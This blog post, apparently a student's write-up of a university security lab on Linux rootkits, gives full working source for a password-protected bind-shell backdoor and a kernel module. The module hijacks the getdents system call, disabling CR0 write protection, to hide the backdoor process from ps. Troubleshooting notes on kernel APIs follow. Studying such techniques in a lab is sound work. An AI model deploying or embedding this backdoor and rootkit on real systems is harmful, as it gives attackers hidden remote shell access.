博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
科软-信息安全实验3-Rootkit劫持系统调用
阅读量:5135 次
发布时间:2019-06-13

本文共 37099 字,大约阅读时间需要 123 分钟。

 目录

一 前言

文章不讲解理论知识哈,想学习理论知识的,认真听课?,也可以参考郭老师的讲义:

对于Linux,我只是个半路闯进来的小白,做实验过程中经常会被Linux内核玩得怀疑人生。所以我觉得很有必要先阐明实验的环境,以免各位同学不小心掉坑里。当然,如果你就是想爬坑,咱也拦不住?

实验环境 / 工具:

  • VMware workstation:VMware-workstation-full-15.0.0-10134415,
  • 2台虚拟机,mice(小白鼠)系统为:ubuntu-16.04.3-desktop-amd64.iso,hacker(黑客)系统为:ubuntu-18.04.2-desktop-amd64.iso,

你可能用得上的网站:

  • Old Ubuntu Releases(老版本的Linux系统下载网址):
  • Linux内核源码搜索:
  • Ubuntu Kernel Release Schedule(内核与操作系统版本的对应关系):

相关实验:

  • 科软-信息安全实验1-ICMP重定向:
  • 科软-信息安全实验2-netfilter实验:

二 Talk is cheap, show me the code

代码是参考往届学长的,然后自己DIY了下。参考自:

Makefile(再次强调一遍,不要更改Makefile文件的名称,并且由于make命令的限制,make -C ... 的前面必须是2个tab(不能将tab转为空格)

1 obj-m += lcx-pshider.o2 3 all:4         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules5 clean:6         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
View Code

backdoor.c

1 #include 
2 #include
3 #include
4 #include
5 #include
6 #include
7 8 #define BUFF_SIZE 128 9 #define PORT 123410 11 int main(int argc, char argv[]) {12 int i, listenfd, acptfd;13 pid_t pid;14 char buf[BUFF_SIZE];15 socklen_t sklen;16 struct sockaddr_in saddr;17 struct sockaddr_in caddr;18 char enterpass[32] = "Password: ";19 char welcome[32] = "Welcome\n";20 char password[5] = "1234";21 char sorry[50] = "Connection failure, error password";22 23 if ((listenfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {24 perror("socket creation error");25 exit(1);26 }27 bzero(&saddr, sizeof(saddr));28 saddr.sin_family = AF_INET;29 saddr.sin_addr.s_addr = htonl(INADDR_ANY);30 saddr.sin_port = htons(PORT);31 32 if (bind(listenfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0 33 || listen(listenfd, 20) < 0) {34 exit(1);35 }36 sklen = sizeof(caddr);37 38 while (1) {39 acptfd = accept(listenfd, (struct sockaddr *)&caddr, &sklen);40 if ((pid = fork()) > 0) {41 exit(0);42 } else if (!pid) {43 close(listenfd);44 write(acptfd, enterpass, strlen(enterpass));45 memset(buf, '\0', BUFF_SIZE);46 read(acptfd, buf, BUFF_SIZE);47 if (strncmp(buf, password, strlen(password)) != 0) {48 write(acptfd, sorry, strlen(sorry));49 close(acptfd);50 exit(0);51 } else {52 write(acptfd, welcome, strlen(welcome));53 dup2(acptfd, 0);54 dup2(acptfd, 1);55 dup2(acptfd, 2);56 execl("/bin/sh", "backdoor", NULL);57 }58 }59 }60 close(acptfd);61 return 0;62 }
View Code

lcx-pshider.c

1 #include 
2 #include
3 #include
4 #include
5 #include
6 #include
7 8 /* https://elixir.bootlin.com/linux/v4.10.17/source/fs/readdir.c#L150 9 * http://www.man7.org/linux/man-pages/man2/getdents.2.html 10 * http://www.man7.org/linux/man-pages/man3/readdir.3.html 11 */ 12 struct linux_dirent { 13 unsigned long d_ino; /* Inode number */ 14 unsigned long d_off; /* Offset to next linux_dirent */ 15 unsigned short d_reclen; /* Length of this linux_dirent */ 16 char d_name[1]; /* Filename (null-terminated) */ 17 }; 18 19 static unsigned long **sys_call_table; 20 21 /* The system call getdents() reads several linux_dirent structures 22 * from the directory referred to by the open file descriptor fd into the buffer pointed to by dirp. 23 * The argument count specifies the size of that buffer. 24 */ 25 long (*orig_getdents)(unsigned int fd, 26 struct linux_dirent __user *dirp, 27 unsigned int count); 28 29 void disable_write_protection(void) { 30 unsigned long cr0 = read_cr0(); 31 clear_bit(16, &cr0); 32 write_cr0(cr0); 33 } 34 35 void enable_write_protection(void) { 36 unsigned long cr0 = read_cr0(); 37 set_bit(16, &cr0); 38 write_cr0(cr0); 39 } 40 41 /** 42 * 获取 PID 的长度 43 * 1) 若当前
是由命令
产生的结果,则返回PID的长度,如: 44 * d_name = "2904" => return 4 45 * 2) 若当前
不是由命令
产生的结果,则返回-1,如: 46 * d_name = "kcore" => return -1 47 * @author southday 48 * @date 2019.05.01 49 */ 50 int get_pid_len(char *d_name) { 51 int len = 0; 52 char *p; 53 for (p = d_name+strlen(d_name)-1; p >= d_name; p--) { 54 if (*p >= '0' && *p <= '9') 55 len++; 56 else 57 return -1; 58 } 59 return len; 60 } 61 62 /** 63 * 判断当前
是否需要过滤 64 * 假设进程
的PID为5930,则/proc/5930/status文件的第一行就包含
进程的名称,如下: 65 * > cat /proc/5930/status | head -n 1 66 * Name: backdoor 67 * 根据匹配/proc/${PID}/status中的进程名称来决定是否过滤该
68 * @author southday 69 * @date 2019.05.01 70 */ 71 int need_filter(char *d_name) { 72 int isneed = 0, pidlen = 0; 73 struct file *fp; 74 mm_segment_t fs; 75 loff_t pos; 76 char *buf = NULL; 77 char *fpath = NULL; 78 char *proc = "/proc/"; 79 char *status = "/status"; 80 81 if ((pidlen = get_pid_len(d_name)) < 0) 82 goto out; 83 84 buf = (char *)kmalloc(64, GFP_KERNEL); 85 fpath = (char *)kmalloc(pidlen+14, GFP_KERNEL); 86 if (buf == NULL || fpath == NULL) 87 goto out; 88 89 // e.g: /proc/2842/status 90 memmove(fpath, (char *)proc, 6); // /proc/ 91 memmove(fpath+6, (char *)d_name, pidlen); // /proc/2842 92 memmove(fpath+6+pidlen, (char *)status, 7); // /proc/2842/status 93 fpath[13+pidlen] = '\0'; 94 printk("pid = %s, pidlen = %d\n", d_name, pidlen); 95 printk("fpath = %s\n", fpath); 96 97 fp = filp_open(fpath, O_RDONLY, 0000); 98 if (IS_ERR(fp)) { 99 printk("file open error, file path: %s\n", fpath);100 goto out;101 }102 103 fs = get_fs(); // 取当前fs值104 set_fs(KERNEL_DS); // 设置fs值,忽略对用户空间地址的检查105 pos = 0;106 /* ssize_t vfs_read(struct file* filp, char __user* buffer, size_t len, loff_t* pos);107 * 1) 第2个参数被 __user* 修饰,表示buffer应该指向用户空间的内存,而这里的buf指向的是内核空间的内存;108 * 2) 如果不进行set_fs(KERNEL_DS)设置,vfs_read()函数会返回失败-EFAULT;109 * 3) set_fs(KERNEL_DS) 绕过对buffer所指内存空间的检查,让下面的vfs_read()函数得以继续进行;110 */111 vfs_read(fp, buf, 64, &pos);112 if (strstr(buf, "backdoor") != NULL) {113 isneed = 1;114 printk("read: \n%s\n", buf); // Name: backdoor115 }116 filp_close(fp, NULL);117 set_fs(fs); // 恢复fs118 out:119 kfree(buf);120 kfree(fpath);121 return isneed;122 }123 124 /**125 * 系统调用劫持函数,劫持ps,过滤掉名为 backdoor 的进程126 * @author southday127 * @date 2019.05.01128 */129 asmlinkage long hack_getdents(unsigned int fd,130 struct linux_dirent __user *dirp,131 unsigned int count) {132 int number = 0, copylen = 0;133 struct linux_dirent *filtered_dirp, // 指向已完成过滤的
134 *orig_dirp, // 指向原始的
135 *td1, *td2; // 用于遍历、连接的临时指针136 137 /* 如果不设置td1, td2,直接用filtered_dirp和orig_dirp进行遍历和连接,138 * 那么在kfree()时就会有问题,因为这两个指针的值已经改变了139 */140 if ((number = (*orig_getdents)(fd, dirp, count)) == 0)141 return 0;142 143 filtered_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL);144 td1 = filtered_dirp;145 orig_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL);146 td2 = orig_dirp;147 copy_from_user(orig_dirp, dirp, number);148 149 while (number > 0) {150 number -= td2->d_reclen;151 // 链表尾插法,忽略掉要过滤的内容,将要保留的
一个个的插到链表td1尾部152 if (!need_filter(td2->d_name)) {153 memmove(td1, (char *)td2, td2->d_reclen);154 td1 = (struct linux_dirent *)((char *)td1 + td2->d_reclen);155 copylen += td2->d_reclen;156 }157 td2 = (struct linux_dirent *)((char *)td2 + td2->d_reclen);158 }159 160 copy_to_user(dirp, filtered_dirp, copylen);161 kfree(orig_dirp);162 kfree(filtered_dirp);163 return copylen;164 }165 166 /**167 * 获取 sys_call_table 的首地址168 * @author southday169 * @date 2019.05.01170 */171 unsigned long ** find_sct(void) {172 u64 lstar, i;173 void *lstar_sct_addr = NULL;174 175 // 将寄存器MSR_LSTAR中的值读到lstar中,该值是system_call处理例程的地址176 rdmsrl(MSR_LSTAR, lstar);177 for (i = 0; i <= PAGE_SIZE; i += 1) {178 u8 *arr = (u8 *)lstar + i;179 /* 搜索负责进行系统调用的代码段,匹配call指令机器码180 * call disp32(,%rax,8) ==> FF 14 C5 -- -- -- --181 * 1) FF 14 C5 是entry_SYSCALL_64的机器码182 * 2) disp32 是SCT的首地址183 */184 if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) {185 lstar_sct_addr = arr + 3;186 break;187 }188 }189 // 扩展为64位,因为SCT首地址符号位为1,所以前面32位直接补1就可以190 return lstar_sct_addr == NULL ? NULL : (void *)(0xffffffff00000000 | *(u32 *)lstar_sct_addr);191 }192 193 static int filter_init(void) {194 printk("fitler_init\n");195 sys_call_table = find_sct();196 if (!sys_call_table) {197 printk("sys_call_table = NULL\n");198 return 0;199 }200 orig_getdents = (void *)sys_call_table[__NR_getdents];201 printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);202 disable_write_protection();203 sys_call_table[__NR_getdents] = (unsigned long *)&hack_getdents;204 enable_write_protection();205 printk("hacked system call getdents, the address is 0x%p\n", (unsigned long *)&hack_getdents);206 printk("modify sct success! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);207 return 0;208 }209 210 static void filter_exit(void) {211 disable_write_protection();212 sys_call_table[__NR_getdents] = (unsigned long *)orig_getdents;213 enable_write_protection();214 printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);215 printk("hack module removed! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);216 printk("fitler_exit\n");217 }218 219 MODULE_LICENSE("GPL");220 module_init(filter_init);221 module_exit(filter_exit);
View Code

三 前期准备

主要关注下 ls 和 ps 关于 direntry 的区别

测试代码:pshider.c

1 #include 
2 #include
3 #include
4 #include
5 6 /* https://elixir.bootlin.com/linux/v4.10.17/source/fs/readdir.c#L150 7 * http://www.man7.org/linux/man-pages/man2/getdents.2.html 8 * http://www.man7.org/linux/man-pages/man3/readdir.3.html 9 */ 10 struct linux_dirent { 11 unsigned long d_ino; /* Inode number */ 12 unsigned long d_off; /* Offset to next linux_dirent */ 13 unsigned short d_reclen; /* Length of this linux_dirent */ 14 char d_name[1]; /* Filename (null-terminated) */ 15 }; 16 17 static unsigned long **sys_call_table; 18 19 long (*orig_getdents)(unsigned int fd, 20 struct linux_dirent __user *dirp, 21 unsigned int count); 22 23 void disable_write_protection(void) { 24 unsigned long cr0 = read_cr0(); 25 clear_bit(16, &cr0); 26 write_cr0(cr0); 27 } 28 29 void enable_write_protection(void) { 30 unsigned long cr0 = read_cr0(); 31 set_bit(16, &cr0); 32 write_cr0(cr0); 33 } 34 35 asmlinkage long hack_getdents(unsigned int fd, 36 struct linux_dirent __user *dirp, 37 unsigned int count) { 38 int number, temp; 39 struct linux_dirent *orig_dirp, // original dirent data 40 *td2; // traverse pointer 41 42 if ((number = (*orig_getdents)(fd, dirp, count)) == 0) 43 return 0; 44 45 temp = number; 46 orig_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL); 47 td2 = orig_dirp; 48 copy_from_user(orig_dirp, dirp, number); 49 while (number > 0) { 50 printk("%lu -> %s\n", td2->d_ino, td2->d_name); 51 number -= td2->d_reclen; 52 td2 = (struct linux_dirent *)((char *)td2 + td2->d_reclen); 53 } 54 kfree(orig_dirp); 55 return temp; 56 } 57 58 unsigned long ** find_sct(void) { 59 u64 lstar, i; 60 void *lstar_sct_addr = NULL; 61 62 rdmsrl(MSR_LSTAR, lstar); 63 for (i = 0; i <= PAGE_SIZE; i += 1) { 64 u8 *arr = (u8 *)lstar + i; 65 if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) { 66 lstar_sct_addr = arr + 3; 67 break; 68 } 69 } 70 return lstar_sct_addr == NULL ? NULL : (void *)(0xffffffff00000000 | *(u32 *)lstar_sct_addr); 71 } 72 73 static int filter_init(void) { 74 printk("fitler_init\n"); 75 sys_call_table = find_sct(); 76 if (!sys_call_table) { 77 printk("sys_call_table = NULL\n"); 78 return 0; 79 } 80 orig_getdents = (void *)sys_call_table[__NR_getdents]; 81 printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents); 82 disable_write_protection(); 83 sys_call_table[__NR_getdents] = (unsigned long *)&hack_getdents; 84 enable_write_protection(); 85 printk("hacked system call getdents, the address is 0x%p\n", (unsigned long *)&hack_getdents); 86 printk("modify sct success! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]); 87 return 0; 88 } 89 90 static void filter_exit(void) { 91 disable_write_protection(); 92 sys_call_table[__NR_getdents] = (unsigned long *)orig_getdents; 93 enable_write_protection(); 94 printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents); 95 printk("hack module removed! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]); 96 printk("fitler_exit\n"); 97 } 98 99 MODULE_LICENSE("GPL");100 module_init(filter_init);101 module_exit(filter_exit);
View Code

insmod后,tail -f /var/log/syslog 查看日志:

ls命令,d_name 都是文件名

1 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ sudo insmod pshider.ko 2 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ ls 3 log.sh    modules.order   pshider.c   pshider.mod.c  pshider.o 4 Makefile  Module.symvers  pshider.ko  pshider.mod.o 5  6 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ tail -f /var/log/syslog 7 May  1 00:10:07 ubuntu kernel: [  367.437543] fitler_init 8 May  1 00:10:07 ubuntu kernel: [  367.437545] original system call getdents, the address is 0xffffffffb0e599a0 9 May  1 00:10:07 ubuntu kernel: [  367.437548] hacked system call getdents, the address is 0xffffffffc029b00010 May  1 00:10:07 ubuntu kernel: [  367.437549] modify sct success! sys_call_table[__NR_getdents] address is 0xffffffffc029b00011 May  1 00:10:10 ubuntu kernel: [  369.661008] 278608 -> pshider.mod.c12 May  1 00:10:10 ubuntu kernel: [  369.661008] 278587 -> Makefile13 May  1 00:10:10 ubuntu kernel: [  369.661009] 278754 -> .pshider.o.cmd14 May  1 00:10:10 ubuntu kernel: [  369.661009] 278605 -> pshider.o15 May  1 00:10:10 ubuntu kernel: [  369.661009] 278756 -> .pshider.ko.cmd16 May  1 00:10:10 ubuntu kernel: [  369.661009] 278610 -> pshider.ko17 May  1 00:10:10 ubuntu kernel: [  369.661010] 278606 -> pshider.mod.o18 May  1 00:10:10 ubuntu kernel: [  369.661010] 278841 -> .pshider.mod.o.cmd19 May  1 00:10:10 ubuntu kernel: [  369.661010] 278607 -> modules.order20 May  1 00:10:10 ubuntu kernel: [  369.661010] 278753 -> .tmp_versions21 May  1 00:10:10 ubuntu kernel: [  369.661010] 278752 -> .22 May  1 00:10:10 ubuntu kernel: [  369.661011] 278603 -> pshider.c23 May  1 00:10:10 ubuntu kernel: [  369.661011] 278580 -> ..24 May  1 00:10:10 ubuntu kernel: [  369.661011] 278832 -> log.sh25 May  1 00:10:10 ubuntu kernel: [  369.661011] 278609 -> Module.symvers26 ...27 May  1 00:10:36 ubuntu kernel: [  396.198553] original system call getdents, the address is 0xffffffffb0e599a028 May  1 00:10:36 ubuntu kernel: [  396.198554] hack module removed! sys_call_table[__NR_getdents] address is 0xffffffffb0e599a029 May  1 00:10:36 ubuntu kernel: [  396.198554] fitler_exit
View Code

ps命令,d_name 是进程PID

1 lcx@ubuntu:~/Documents/InfoSecLab/E3$ ./backdoor & 2 [1] 2826 3  4 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ sudo insmod pshider.ko 5 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ ps -aux | grep backdoor 6 lcx        2826  0.0  0.0   4224   648 pts/19   S    00:20   0:00 ./backdoor 7 lcx        2842  0.0  0.0  21292   928 pts/6    S+   00:21   0:00 grep --color=auto backdoor 8  9 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ tail -f /var/log/syslog10 May  1 00:20:49 ubuntu kernel: [ 1009.460784] fitler_init11 May  1 00:20:49 ubuntu kernel: [ 1009.460786] original system call getdents, the address is 0xffffffffb0e599a012 May  1 00:20:49 ubuntu kernel: [ 1009.460790] hacked system call getdents, the address is 0xffffffffc029b00013 May  1 00:20:49 ubuntu kernel: [ 1009.460790] modify sct success! sys_call_table[__NR_getdents] address is 0xffffffffc029b00014 May  1 00:21:01 ubuntu kernel: [ 1020.909999] 1 -> .15 May  1 00:21:01 ubuntu kernel: [ 1020.910000] 1 -> ..16 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531963 -> fb17 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531846 -> fs18 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531854 -> bus19 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026532028 -> dma20 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531858 -> irq21 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026532408 -> mpt22 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531844 -> net23 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531855 -> sys24 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531849 -> tty25 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531965 -> acpi26 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026532045 -> keys27 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531996 -> kmsg28 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531967 -> misc29 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531961 -> mtrr30 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531969 -> scsi31 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531991 -> stat32 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026532024 -> iomem33 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531995 -> kcore34 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531983 -> locks35 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026532037 -> swaps36 ...37 May  1 00:21:01 ubuntu kernel: [ 1020.910013] 14359 -> 138 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 227 -> 239 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 231 -> 440 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 235 -> 641 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 237 -> 742 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 239 -> 843 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 241 -> 944 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 243 -> 1045 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 245 -> 1146 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 247 -> 1247 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 249 -> 1348 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 251 -> 1449 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 253 -> 1550 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 255 -> 1651 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 259 -> 1852 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 261 -> 1953 May  1 00:21:01 ubuntu kernel: [ 1020.910017] 263 -> 2054 ...55 May  1 00:21:01 ubuntu kernel: [ 1020.910061] 31098 -> 282656 May  1 00:21:01 ubuntu kernel: [ 1020.910061] 31098 -> 282657 ...58 May  1 00:21:50 ubuntu kernel: [ 1070.023470] original system call getdents, the address is 0xffffffffb0e599a059 May  1 00:21:50 ubuntu kernel: [ 1070.023471] hack module removed! sys_call_table[__NR_getdents] address is 0xffffffffb0e599a060 May  1 00:21:50 ubuntu kernel: [ 1070.023471] fitler_exit
View Code

?

四 效果演示

1 后门程序运行效果

1)在 mice 上装上后门程序 backdoor,后台运行该程序;

2)hacker 用 nc 连接上后门程序,可以获得一个shell,如图:

2 在 mice 中载入内核模块 lcx-pshider.ko

1)载入前执行 ps

2)载入内核模块 lcx-pshider.ko,查看日志 tail -f /var/log/syslog,执行 ps

3)执行 ps,发现 backdoor 被隐藏了

4)移除内核模块 lcx-pshider,再次执行 ps,backdoor 现身了

五 遇到的问题&解决

1 warning: missing sentinel in function call

backdoor.c:55:17: warning: missing sentinel in function call [-Wformat=]                  execl("/bin/sh", "backdoor", 0);                  ^~~~~// sentinel  /'sentɪn(ə)l/,n. 哨兵

将代码改为:execl("/bin/sh", "backdoor", (char *)0);

或者改为:execl("/bin/sh", "backdoor", NULL);

1.1 bind(listenfd, (struct sockaddr *)&saddr, sizeof(saddr)

#include 
#include
int bind(int socket, const struct sockaddr* my_addr, socklen_t addrlen);

bind将my_addr所指的socket地址分配给未命名的sockfd文件描述符,addrlen参数指出该socket地址的长度。

调用成功返回0, 失败返回-1,并设置errno;

1.2 listen(listenfd, 20)

#include 
int listen(int sockfd, int backlog);

创建一个监听队列以存放待处理的客户连接。

1)sockfd参数指定被监听的socket;
2)backlog参数提示内核监听队列的最大长度。如果监听队列的长度超过backlog,服务器将不受理新的客户连接,客户端也将收到ECONNREFUSED错误信息。在内核版本2.2之前,backlog是指所有处于半连接状态(SYN_RCVD)和完全连接状态(ESTABLISHED)的socket上限。但在内核版本2.2以后, 它只表示处于完全连接状态的socket上限,处于半连接状态的socket上限则由/proc/sys/net/ipv4/tcp_max_syn_backlog内核参数定义。
backlog参数的典型值为5;调用成功时返为0,失败时为-1,并设置errno;

1.3 accept(listenfd, (struct sockaddr *)&caddr, &sklen)

#include 
#include
int accept(int sockfd, struct sockaddr* addr, socklen_t *addrlen);

sockfd参数是执行过listen调用的监听socket。addr参数用来获取被接受连接的远端socket地址,该地址的长度由addrlen参数指出。

调用成功时返回一个新的连接socket,该socket唯一标识了被接受的这个连接,服务器可通过读写该socket来与客户端通信;失败时返回-1,并设置errno;

1.1、1.2、1.3,参考资料:

2 Linux 内核 4.8.17 中 copy_from_user() 和 copy_to_user()

在:<linux/uaccess.h> 中;参考:

还可能引出的问题:

./arch/x86/include/asm/uaccess.h:32:9: error: dereferencing pointer to incomplete type ‘struct task_struct’  current->thread.addr_limit = fs;         ^~

把代码中的 #include <asm/uaccess.h> 替换为 #include <linux/uaccess.h>,不要两个都引入;

3 编译时的 waring:ISO C90 forbids mixed declarations and code

/home/lcx/Documents/InfoSecLab/E3/ls_hide.c:69:5: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]     unsigned long *lstar_sct_addr = (unsigned long *)get_lstar_sct_addr();     ^~~~~~~~

把变量 *lstar_sct_addr 的声明放到函数的最前面:

参考:

4 rmmod module error

这个问题我没解决;

rmmod:rmmod: ERROR: Module ls_hide is in use;rmmod: ERROR: ../libkmod/libkmod-module.c:793 kmod_module_remove_module() could not remove 'ls_hide': Device or resource busyrmmod: ERROR: could not remove module ls_hide: Device or resource busy

5 如何根据PID获取到进程名称

mice 后台运行 backdoor:> ./backdoor &

查看进程:> ps aux | tail -n 3

根据进程PID找到进程名称:> cat /proc/3010/status | head -n 10

6 char *strstr(const char *haystack, const char *needle) 的使用;

参考:

1 #include 
2 #include
3 4 int main() { 5 char *s = "http://see.xidian.edu.cn/cpp/u/xitong/"; 6 char *r = NULL; 7 if ((r = strstr(s, "xidian")) != NULL) 8 printf("%s\n", r); 9 if ((r = strstr(s, "xcvklweu")) != NULL)10 printf("%s\n", r);11 return 0;12 }13 // 输出14 xidian.edu.cn/cpp/u/xitong/
View Code

7 u8 u64 等意思

参考:

1 typedef signed char s8; 2 typedef unsigned char u8; 3    4 typedef signed short s16; 5 typedef unsigned short u16; 6    7 typedef signed int s32; 8 typedef unsigned int u32; 9   10 typedef signed long long s64;11 typedef unsigned long long u64;
View Code

8 什么是 getdents()?readdir()?

getdents,getdents64 —— get directory entries

struct dirent {   ino_t          d_ino;       /* Inode number */   off_t          d_off;       /* Not an offset; see below */   unsigned short d_reclen;    /* Length of this record */   unsigned char  d_type;      /* Type of file; not supported                                  by all filesystem types */   char           d_name[256]; /* Null-terminated filename */};

参考:

  • man7.org > Linux > man-pages > getdents:
  • man7.org > Linux > man-pages > readdir.3:
  • readdir函数解析:
The system call getdents() reads several linux_dirent structures from the directory referred to by the open file descriptor fd into the buffer pointed to by dirp. The argument count specifies the size of that buffer.

参考:

9 关于 struct linux_dirent,struct linux_dirent64

在 fs/readdir.c 中有 linux_dirent 的定义,如下:

struct linux_dirent {    unsigned long   d_ino;    unsigned long   d_off;    unsigned short  d_reclen;    char        d_name[1];};

你可以在 ps_hider.c 文件中定义自己的 linux_dirent 结构体,或者使用 linux/dirent.h 中定义好的 linux_dirent64 结构体,如下:

struct linux_dirent64 {    u64     d_ino;    s64     d_off;    unsigned short  d_reclen;    unsigned char   d_type;    char        d_name[0];};// 需要包含头文件 

参考:

10 什么是 GLIBC?

1)GNU C库(英语:GNU C Library,常简称为glibc)是一种按照LGPL许可协议发布的,自由的,公开源代码的,方便从网络下载的C的编译程序。GNU C运行期库,是一种C函数库,是程序运行时使用到的一些API集合,它们一般是已预先编译好,以二进制代码形式存在Linux类系统中,GNU C运行期库通常作为GNU C编译程序的一个部分发布。
2)Glibc最初是自由软件基金会(FSF)为其GNU操作系统所写,但当前最主要的应用是配合Linux内核,成为GNU/Linux操作系统一个重要的组成部分。
参考:GNU C库:

11 __user 修饰符的作用?

在下面的代码中使用了__user:

asmlinkage long my_getdents(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count){}

解释:

  • __user表明参数是一个用户空间的指针,不能在kernel代码中直接访问。也方便其它工具对代码进行检查;
  • 它允许像sparse这样的工具告诉内核开发人员他们可能使用不可信的指针(或者在当前虚拟地址映射中可能无效的指针)不正确。

参考:

  • Linux kernel 笔记 (38)——”__user”修饰符:
  • What are the implications of the linux __user macro?:
  • __user表示是一个用户空间的指针,所以kernel不可能直接使用。:

12 error: function declaration isn’t a prototype

/home/lcx/Documents/InfoSecLab/E3/pshider/lcx-ps_hider.c:5:6: error: function declaration isn’t a prototype [-Werror=strict-prototypes]void disable_write_protection() {      ^~~~~~~~~~~~~~~~~~~~~~~~

重新定义函数为:void disable_write_protection(void) {}

13 为什么 sys_call_table 的类型要声明为 unsigned long **?

参考的代码 ps_hide.c 中有代码:

static unsigned long **sys_call_table;

在 arch/x86/kernel/syscall_64.c 中找到 sys_call_table 的定义:

asmlinkage const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = {    /*     * Smells like a compiler bug -- it doesn't work     * when the & below is removed.     */    [0 ... __NR_syscall_max] = &sys_ni_syscall,#include 
};

在 arch/x86/include/asm/syscall.h 中找到 sys_call_ptr_t 的定义:

typedef asmlinkage long (*sys_call_ptr_t)(unsigned long, unsigned long,                                          unsigned long, unsigned long,                                          unsigned long, unsigned long);extern const sys_call_ptr_t sys_call_table[];

时间有限,我也只追查到这个程度;

我的理解是:

  • sys_call_table[] 中保存的是一系列系统调用的函数指针;
  • 每一个函数指针(函数)都是返回 long类型数据,并且有一组 unsigned long 类型的参数;

参考:

  • [译] Linux系统调用权威指南-4.2.3 内核空间:syscall 入口:

14 void * 指针的作用?

void的意思就是“无类型”,void指针则为“无类型指针”,void指针可以指向任何类型的数据。所以void指针一般被称为通用指针或者泛指针,或者叫做万能指针。

在C语言中在任何时候都可以用void类型的指针来代替其他类型的指针,void指针可以指向任何数据类型的变量;
如果要通过void指针去获取它所指向的变量值时候,需要先将void指针强制类型转换成和变量名类型想匹配的数据类型指针后再进行操作,然后才能对原来的void指针指向的空间进行操作;

void *p;int *pa = (int *)p;

任何类型的指针都可以赋值给void指针,无需进行强制类型转换;

int a = 1;int *pa = &a;void *p = pa; // 无需强转

参考:

15 GCC G++ 编译有何区别?

对于下面代码:

1 #include 
2 #include
3 4 unsigned long ** getllp(); 5 void cast_test(); 6 7 int main() { 8 unsigned long **llp = getllp(); 9 printf("llp = %p\n", llp);10 cast_test();11 return 0;12 }13 14 unsigned long ** getllp() {15 int a = 1;16 void *p = &a;17 printf("p = %p\n", p);18 return (void *)(0xffffffff00000000 | *(unsigned int *)p);19 }20 21 void cast_test() {22 int a = 1;23 void *p = &a;24 unsigned long **llp = (void *)(0xffffffff00000000 | *(unsigned int *)p);25 printf("p = %p, llp = %p\n", p, llp);26 }
View Code

GCC 编译:

G++ 编译:

也就是说,void * 转换为其他类型指针时:

  • GCC 无需显示强制转换,还是说编译器内部自动帮你转换?
  • G++ 需要显示的强制转换,否则编译失败;

GCC和G++的关联与区别:

  • 1)后缀为.c的,gcc把它当作是C程序,而g++当作是c++程序;后缀为.cpp的,两者都会认为是c++程序;
  • 2)c++是c的超集,两者对语法的要求是有区别的,C++的语法规则更加严谨一些;
  • 3)在编译阶段,g++会调用gcc,对于c++代码,两者是等价的,但是因为gcc命令不能自动和C++程序使用的库联接,所以通常用g++来完成链接;

参考: gcc与g++的区别:

16 PAGE_SIZE 在哪里定义?是什么意思?

出自 ps_hide.c 中的 get_lstar_sct_addr 方法:

